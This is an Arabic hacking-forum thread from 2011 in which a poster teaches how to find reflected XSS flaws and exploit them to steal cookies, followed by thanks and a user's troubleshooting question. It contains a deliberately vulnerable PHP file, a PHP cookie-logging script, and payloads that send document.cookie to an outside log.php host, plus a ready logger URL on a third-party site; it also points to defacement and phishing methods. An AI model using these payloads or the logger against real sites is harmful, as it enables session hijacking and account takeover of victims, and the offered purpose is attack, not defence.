[ تم التجديد ] ~ شرح كامل متكامل لتغرات xss ~ | احترافي ..~

bleu moon · 08-21-2011, 03:26 PM

بسم الله الرحمآن الرحيم

ان شاء الله اليوم رح نشرح

\ اكتشاف تغرات xss
\ تعليق الآندكس من تغرات xss
\ سرقة كوكيز من تغرات xss

################

سرقة الكوكيز من تغرات xss

اولا لازم نقوم بتنصيب السيرفر الشخصي ع جهازنا

download

تانيا لازم يكون عندنا الموقع المصاب او السكربت

انا برمجة ملف عادي جدآآ ! مصاب بهذه التغره

نسميه مثلا ..~

xss.php

ومحتواه علشان تجربوآا معي الاستغلال الكامل لها ..~

كود PHP:

  
<?
echo $_GET***91;'test'***93; ;

echo '<b>@nor15din</b>'
?>

طيب الآن نستعرض الملف المصاب مع المتغير !

~~~~~~~~~~~~
على فكره شباب !
تم شرح التغره من قبل في المنتدى ..~
يستحسن انكم تراجعوا هذا الرابط ..~

http://www.vbspiders.com/vb/t24758.html

&

http://www.vbspiders.com/vb/t22376.html
~~~~~~~~~~~~

طيب نتابع

طبعا كيف نكتشف التغره سهل كثير ..~
يعني تضيف الكود هذا

كود PHP:

  
'"--></style></script>***************("Www.VbspiderS.Com")</script>

بعد المتغير ..~
رح ارفق لكم الكود في المرفقات مع كل حاجه !

طيب رح نضغط اوونتر ورح تشوف ان رساله ضهرت لنا في المتصفح ..~

تعال الآن نستفيد من التغره !
اولا التغره تقدر تسرق بها كوكيز الآدمن او الضحيه بصفه عامه ..~
تقدر تحقن اكواد html او تغره للمتصفح ملغومه بباتش علشان تخترق ..~
شو هاي الحلاوه ..~
ههه
انا رح اشرح لكم كيف تسرق الكوكيز ..~
اولا لازمنا ملف لوج علشان يسجل لنا الكوكيز والمعلومات في ملف txt

ملفات اللوج تكون خاصه :(
وهناك ملفات لووج تجيب لك معلومات كامله !
كوكيز + الوقت + التاريخ + ...
وفي نوع آخر عادي ..~
يعطيك الكوكيز فقط !
ههع
رح اعطيكم ملف لووج عندي كثير حلو

طيب نشوف السورس كود بتاعوا ..~

كود PHP:

  
<?php 


function GetIP() 
{ 
    if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown")) 
        $ip = getenv("HTTP_CLIENT_IP"); 
    else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown")) 
        $ip = getenv("HTTP_X_FORWARDED_FOR"); 
    else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown")) 
        $ip = getenv("REMOTE_ADDR"); 
    else if (isset($_SERVER***91;'REMOTE_ADDR'***93;) && $_SERVER***91;'REMOTE_ADDR'***93; && strcasecmp($_SERVER***91;'REMOTE_ADDR'***93;, "unknown")) 
        $ip = $_SERVER***91;'REMOTE_ADDR'***93;; 
    else 
        $ip = "unknown"; 
    return($ip); 
} 

function logData() 
{ 
    $ipLog="nor15din.txt"; 
    $****** = $_SERVER***91;'QUERY_STRING'***93;; 
    $register_globals = (bool) ini_get('register_gobals'); 
    if ($register_globals) $ip = getenv('REMOTE_ADDR'); 
    else $ip = GetIP(); 

    $rem_port = $_SERVER***91;'REMOTE_PORT'***93;; 
    $user_agent = $_SERVER***91;'HTTP_USER_AGENT'***93;; 
    $rqst_method = $_SERVER***91;'METHOD'***93;; 
    $rem_host = $_SERVER***91;'REMOTE_HOST'***93;; 
    $referer = $_SERVER***91;'HTTP_REFERER'***93;; 
    $date=date ("l dS of F Y h:i:s A"); 
    $log=fopen("$ipLog", "a+"); 

    if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog)) 
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | ******:  $****** <br>"); 
    else 
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host |  Agent: $user_agent | METHOD: $rqst_method | REF: $referer |  DATE: $date | ******:  $****** \n\n"); 
    fclose($log); 
} 

logData();

echo '<b>powered by vbspiders team</b>'
?>

لازم نرفعوا على شل :(
انا عندي مرفوع على شل ..~

الموقع يلي رفعنا لو الووج رح يكون زي هيك مثلا !

www.vbspiders.com/log.php

ورح يسجل لنا المعلوومات في ملف اسموا nor15din.txt

www.vbspiders.com/nor15din.txt

طيب الآن كيف نستغل التغره ..~

يلزمنى كود تلغيم ..~

كود PHP:

  
"><a href="#" onclick="********.location='http://vbspiders.com/log.php?******=' +escape(********.******);"><Click Me></a></script>

or

كود PHP:

  
"><script language= "JavaScript">********.location="http://vbspiders.com/log.php?******=" + ********.******;********.location="http://www.google.com"</script>

حلو !
رح نضيف هذول الاكواد مع تغير مايجب تغيره

اقتباس


	http://localhost/xss.php?test="><a href="#" onclick="******.location='http://vbspiders.com/log.php?**=' +escape(****.****);"><Click Me></a></script>

نضط اوونتر ونروح نفتح الملف nor15din.txt

اقتباس


	IP: \| PORT: 56840 \| HOST: \| Agent: \| METHOD: \| REF: \| DATE: \| ****: ****=

ههههه حلو ..~
ياريت اي واحد ينقل الموضوع ..~
يحافض على الحقوق :(

لتحميل الادواة

~~~~~~~~~~~~~~~~~~

الشي يلي اضفناه وجديد هو اننا شرحنا كل شي تقريبا يتعلق بهذه التغره في فيديوا + صفحه HTML

لتحميل الشرح الكامل على شكل صفحه HTML

لتحميل فيديوا التطبيق

وفي الاخير هذيه بسيطه وهي ملف لوج مرفوووع وجاهز

http://www.illicitromance.com/log.php

وفي هذه الصفحه رح يتم تسجيل الكوكيز + المعلومات

http://www.illicitromance.com/nor15din.txt

ع فكره هذه طريقة اخرى لتعليق آندكس مميز من تغرات

xss

priv8 ~ تعليق الاندكس من ثغرات priv8 ~ xss

~~~~~~~~~~~~

وهنا طريقة اخرى لاستغلال التغره مشروحة من طرف حبيبنا

IronMan

جديد استخدامات xss وهي الـ phishing login

بالتوفيق ..
@nor15din

المصدر: :: vBspiders Professional Network ::

F jl hgj[]d] D Z avp ;hlg lj;hlg gjyvhj xss | hpjvhtd >>Z la;gi l,q,u l,ru g;k hg]dk hgw,v hpjvht hsjtshv []d] vtu avp

Crazy Dz · 08-21-2011, 03:38 PM

بارك الله فيك علي شرح ثغرة قوية

k4$p3r-MA · 08-21-2011, 03:40 PM

بارك الله فيك

bleu moon · 08-21-2011, 03:41 PM

اقتباس

المشاركة الأصلية كتبت بواسطة Crazy Dz


	بارك الله فيك علي شرح ثغرة قوية

والله تغره قويه خصوصا اذا كانت من نوع stored xss

bleu moon · 08-21-2011, 03:43 PM

اقتباس

المشاركة الأصلية كتبت بواسطة k4$p3r-MA


	woooow thx fun بارك الله فيك

thx fun

شفتني العب مع القرده ؟

-------------------------------------

برب بمزح ههه
يعطيك العافيه يا حبيبي كاسبر !
الشرح فيديوا يلي قلت لي عنه رح انزلوا لك ان شاء الله :(

Dr.Mix · 08-21-2011, 04:51 PM

مشكووووووووور اخ نورد الدين على الشرح الوافي ماشاء الله عليك دائما متوفق سلآم

bleu moon · 08-21-2011, 05:59 PM

اقتباس

المشاركة الأصلية كتبت بواسطة Haboubamix


	مشكووووووووور اخ نورد الدين على الشرح الوافي ماشاء الله عليك دائما متوفق سلآم

يعطيك العافيه ..~

Antivirus7 · 08-21-2011, 06:10 PM

وعليــكم السـلآم و رحمة الله
الله يعطيـك العآفية حبيبي نورالدين
شرح ممتآز تســلم أيديك
تقبل مروري

bleu moon · 08-21-2011, 06:57 PM

اقتباس

المشاركة الأصلية كتبت بواسطة Antivirus7


	وعليــكم السـلآم و رحمة الله الله يعطيـك العآفية حبيبي نورالدين شرح ممتآز تســلم أيديك تقبل مروري

منور الموضوع يا حلو والله

تسلم على المرور العطر

DR.THMoORY · 08-21-2011, 09:15 PM

بطل حبيبي..
يسلمو ايديك..

bleu moon · 08-21-2011, 09:26 PM

اقتباس

المشاركة الأصلية كتبت بواسطة DR.THMoORY


	بطل حبيبي.. يسلمو ايديك..

منور الموضوع يا حبيبي

mass1993 · 08-21-2011, 11:30 PM

يعطيك العافية اخوي عالشرح ...ولكن عندي استفسار:

انا عندي سيرفر شخصي اباتشي اصدار 2.5.8 ووضعت ملف الثغرة فيه وكل اشي تمام...ولكن لما كتبت هذا الكود بالمتصفح:

كود:

'"--></style></script>***************("Www.VBspiders.com")</script>

وضغطت انتر ما طلعلي تنبيه في المتصفح وطبعلي التاليي:

كود:

\'\"

ولكن لما كتبت الامر هذا :

كود:

'"--></style></script>***************(4444444)</script>

وضغطت انتر طلع التنبيه وكل اشي تمام...

ولكن لما اجيت احط هذا الامر:

كود:

"><a href="#" onclick="********.location='http://localhost/log.php' +escape(********.******);"><Click Me></a></script>

ورحت لملف nor15din ما لقيت اشي فيه...اخوي شو هالمشكلة بالله عليك وليش صار هيك معي؟؟؟

تحياتي

bleu moon · 08-22-2011, 07:35 AM

اقتباس

المشاركة الأصلية كتبت بواسطة mass1993


	يعطيك العافية اخوي عالشرح ...ولكن عندي استفسار: انا عندي سيرفر شخصي اباتشي اصدار 2.5.8 ووضعت ملف الثغرة فيه وكل اشي تمام...ولكن لما كتبت هذا الكود بالمتصفح: كود: '"--></style></script>*************("Www.VBspiders.com")</script> وضغطت انتر ما طلعلي تنبيه في المتصفح وطبعلي التاليي: كود: \'\" ولكن لما كتبت الامر هذا : كود: '"--></style></script>***********(4444444)</script> وضغطت انتر طلع التنبيه وكل اشي تمام... ولكن لما اجيت احط هذا الامر: كود: "><a href="#" onclick="****.location='http://localhost/log.php' +escape(****.****);"><Click Me></a></script> ورحت لملف nor15din ما لقيت اشي فيه...اخوي شو هالمشكلة بالله عليك وليش صار هيك معي؟؟؟ تحياتي